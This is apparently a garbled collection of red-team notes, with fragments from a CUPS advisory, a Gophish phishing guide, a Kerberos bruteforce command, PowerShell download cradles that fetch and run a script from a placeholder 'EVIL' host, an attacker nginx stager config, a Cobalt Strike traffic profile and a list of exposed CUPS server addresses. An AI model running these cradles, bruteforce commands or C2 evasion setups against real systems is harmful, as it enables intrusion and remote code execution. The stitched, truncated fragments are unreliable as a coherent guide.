Christopher CalfCrusher

list of contents

Infrastructure
- Redirectors
- Domain fronting
OpSec
- Customer ID
Payloads
- DNS Beacon
SMB Beacon

Original report

Affected Vendor: OpenPrinting
Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
Affected Version: All versions <= 2.0.1 (latest release) and master.
Significant ICS/OT impact? no
Reporter: Simone Margaritelli [[email protected]]
Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed:

https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishingn campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

	ip,user_agent
	116.202.x.x,CUPS/2.2.10 (Linux 4.19.0-17-amd64; x86_64) IPP/2.0
	212.235.x.x,CUPS/2.2.7 (Linux 4.15.0-213-generic; x86_64) IPP/2.0
	202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
	202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
	5.9.x.x,CUPS/2.2.7 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
	147.203.x.x,CUPS/2.2.7 (Linux 4.15.0-176-generic; x86_64) IPP/2.0
	60.191.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
	64.62.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
	103.234.x.x,CUPS/2.4.1 (Linux 5.15.0-118-generic; x86_64) IPP/2.0

	POST /druid/indexer/v1/sampler HTTP/1.1
	Host: x.x.x.x:8888
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
	Accept: application/json, text/plain, /
	Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
	Content-Type: application/json
	Content-Length: 1045
	Connection: close

	limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;

	server {
	root /var/www/attacker-site.com/html;
	index index.html;
	server_name attacker-site.com www.attacker-site.com;
	location / {
	try_files $uri $uri/ =404;
	}
	location = /bypassamsiandrequeststager.txt {

	#
	# Modified Amazon browsing traffic profile
	#

	set sleeptime "10000"; # Increased sleep time to 10 seconds
	set jitter "500"; # Increased jitter to 500 milliseconds
	set maxdns "255";
	set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent

	http-get {

	Add-Type -OutputAssembly hello.exe -TypeDefinition @'
	using System;

	public class Hello {
	public static void Main(string[] Args) {
	System.Console.WriteLine("Hello, world!");
	System.Console.Read();
	}
	}
	'@